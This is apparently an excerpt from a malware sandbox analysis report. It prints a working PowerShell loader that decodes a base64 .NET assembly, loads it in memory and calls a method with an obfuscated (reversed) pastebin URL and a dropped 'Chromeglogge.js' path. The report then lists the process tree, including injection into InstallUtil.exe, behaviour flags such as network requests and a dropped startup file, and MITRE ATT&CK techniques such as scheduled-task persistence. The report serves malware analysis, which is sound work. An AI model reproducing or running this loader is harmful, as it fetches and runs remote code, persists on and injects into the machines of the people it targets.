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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAPhjAAAAAAAAAAAAABJkAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEZAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABABAAAAAYAACAAAAAAAAAAAAAAAAAAAABAAEAAAAwAACAAAAAAAAAAAAAAAAAAAABAAAAAABIAAAAWIAAADwDAAAAAAAAAAAAADwDNAAAAFYAUwBfAFYARQBSAFMASQBPAE4AXwBJAE4ARgBPAAAAAAC9BO/+AAABAAAAAQAAAAAAAAABAAAAAAA/AAAAAAAAAAQAAAACAAAAAAAAAAAAAAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAAAsAScAgAAAQBTAHQAcgBpAG4AZwBGAGkAbABlAEkAbgBmAG8AAAB4AgAAAQAwADAAMAAwADAANABiADAAAAAaAAEAAQBDAG8AbQBtAGUAbgB0AHMAAAAAAAAAIgABAAEAQwBvAG0AcABhAG4AeQBOAGEAbQBlAAAAAAAAAAAARAAOAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAABEABIAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAAEgAEgABAEwAZQBnAGEAbABDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAATAASAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEMAbABhAHMAcwBMAGkAYgByAGEAcgB5ADMALgBkAGwAbAAAADwADgABAFAAcgBvAGQAdQBjAHQATgBhAG0AZQAAAAAAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMwAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgAAAMAAAAJDQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA';[Byte[]] $EuKVK = [System.Convert]::FromBase64String( $bFjDJ );[System.AppDomain]::CurrentDomain.Load($EuKVK).GetType('ClassLibrary3.reed').GetMethod('testd').Invoke($null, [object[]] ('xvdvZ3wN/war/moc.nibetsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\Chromeglogge.js' , 'Chromeudata', '3', '1', 'Regedit Name' ) );
  2⤵
  - Blocklisted process makes network request
  - Drops startup file
  - Suspicious use of SetThreadContext
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    PID:4772

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Credential Access

Discovery

Query Registry

System Information Discovery